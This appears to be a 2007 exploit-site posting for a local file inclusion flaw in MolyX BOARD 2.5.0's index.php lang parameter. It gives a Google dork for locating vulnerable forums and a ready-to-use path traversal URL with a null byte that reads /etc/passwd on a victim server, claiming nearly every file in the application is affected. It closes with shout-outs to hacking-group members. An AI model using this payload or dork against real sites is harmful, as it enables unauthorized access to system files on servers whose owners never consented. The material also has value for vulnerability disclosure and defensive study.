MolyX BOARD 2.5.0 (index.php lang) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MolyX BOARD 2.5.0 (index.php lang) Local File Inclusion Vulnerability
# Published : 2007-05-18
# Author : MurderSkillz
# Previous Title : Libstats <= 1.0.3 (template_csv.php) Remote File Inclusion Vulnerability
# Next Title : Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability

=============== MolyX BOARD 2.5.0 Local File Inclusion ==== Possibly other versions

=============== Vulnerability found by MurderSkillz ==============================================

=============== d0rk "Powered by MolyX BOARD 2.5.0" =========================================

=============== Website: g00ns.net g00ns-forum.net ============================================

=============== Irc: irc.exploitercode.com:6667 ts: ts.g00ns.net ====================================

=============== Script website: molyx.com ====================================================

############### Exploit ###################################################################

www.victim.com/[path to board if any]/index.php?lang=../../../../../../../../etc/passwd%00

This Vulnerability takes place in pretty much every file in this webapp...

########################################################################################

Shouts: FiSh,sCuZz, sick, clorox, z3r0, katalyst, SyNiCaL, overdose, pr0be, Trintitty, rezen, str0ke and everyone else at g00ns.net that I forgot..

# www.Syue.com [2007-05-18]